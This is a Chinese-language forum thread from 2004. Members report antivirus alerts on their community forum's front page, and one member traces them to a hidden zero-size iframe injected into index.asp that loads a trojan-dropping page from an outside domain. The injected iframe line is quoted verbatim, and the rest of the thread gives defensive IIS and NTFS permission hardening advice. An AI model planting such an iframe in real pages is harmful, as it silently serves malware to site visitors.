[注意]孤星：怎么回事？

xushidong57

我进站务版的时候，norton会提示出现病毒；其他板块还无此问题。

不知是我们服务器的问题还是我电脑的问题，如果是后者倒好办；如果是服务器的话，提醒孤星注意。

其他朋友有没有发现这个现象？

yihen

没有发现此类现象。

YILINGTREE

今天我也是，一回到首页就出现以下问题：

下载 (163.02 KB)
[注意]孤星：怎么回事？

2004-7-1 10:45

zxzx5050

有的 不过被我上网助手拦截了！

怎么办 我们的家！！！

不愿意接受！

QQ千寻23

我的也被上网助手拦截了，希望孤星能看看，如何解决才好？[em11]

xingqu

是过于敏感吗？

潇影

我没有发现呢，自从上次4月26号我失了15G资料外我就没有装任何杀毒的东东。不过心爱倒是要注意了，请高手来帮忙啊。(但我发现了：这两天我在论坛看贴经常会出“系统出现错误日志”的面板，点“取消”后则自动退出。好像是真的有点问题了。)

[此贴子已经被作者于2004-7-2 1:13:31编辑过]

小强

社区论坛首页病毒名称为:    TrojanDropper.VBS.Jingtao病毒在浏览器缓存中的名称是：counter[1].hta 和CAZ6GVR1.hta    我的KV2004可以查杀,但每次打开心爱社区论坛都会报警发现以上毒病!!!! 管理员和各位斑主快采取措施啊!![em06][em16][em16][em16]

sdfan

搞不清楚怎么回事，估计是被人给黑了吧，不过好像并不是针对论坛的，因为数据没有影响，各项功能都正常。

我将论坛的index.asp下载下来看多了一条 <iframe src="http://bbs.ddvod.com/skin/more/gif/counter.htm" name="zhu" width="0" height="0" frameborder="0"></iframe> 所以会弹出那个病毒页面，但病毒应该是不在服务器上，只能说幸好没有针对论坛的攻击。鱼赶紧让孤星将论坛升级吧，将index.asp覆盖应该就可以了。

sdfan

无法判断是如何更改论坛首页的。[em06]

只有加强安全将服务器系统应更新到最新，另外iis和ntfs权限的设置也需要加强（针对通过论坛将asp木马上传到uploadface等目录然后执行，一般应该是这种情况）

IIS中的设置：

对不需要asp有执行许可的目录，如data目录，images目录,uploadfile,uploadface等里面没有asp文件的目录，根本不需要对其设置asp的运行权。而默认是整站都有asp的运行权的，所以需要在IIS中将以上目录的“执行许可”设置为“无”（在IIS管理器中右键点相关目录，选择属性，在属性界面中设置）。 禁止这些目录的尤其是uploadfile和uploadface这些上传相关的目录的asp执行许可，能够使得即使有人利用了动网的上传漏洞在这些目录里面传上了木马文件，但这些asp木马文件却无法运行。

NTFS中的设置：

NTFS权限设置应该是一个安全设置的基本前提。关键点有： （1）删除默认的Everyone对web目录所有的权限。 （2）一般情况下，Administrator和system对web目录应拥有完全的权限。 （3）对web目录设置IUSR_ServerName（此帐号是web访问者使用的系统默认帐号）的详细权限：只有三个目录需要有读和写的权限，分别是data,uploadfile和uploadimage，其他的目录和论坛根目录只设置读的权限即可。这样设置的目的在于，即使被人上传了asp木马，若没有取得管理员权限，他也无法对论坛的asp文件进行修改，从而使得即使被攻击，也可以将损失面降低到最少（比如你的插件和自己写的代码不会被删除）。

按照上面方法设置后，应该不会再有安全问题了，不过还是挺麻烦的，还是得尽快让孤星出马才行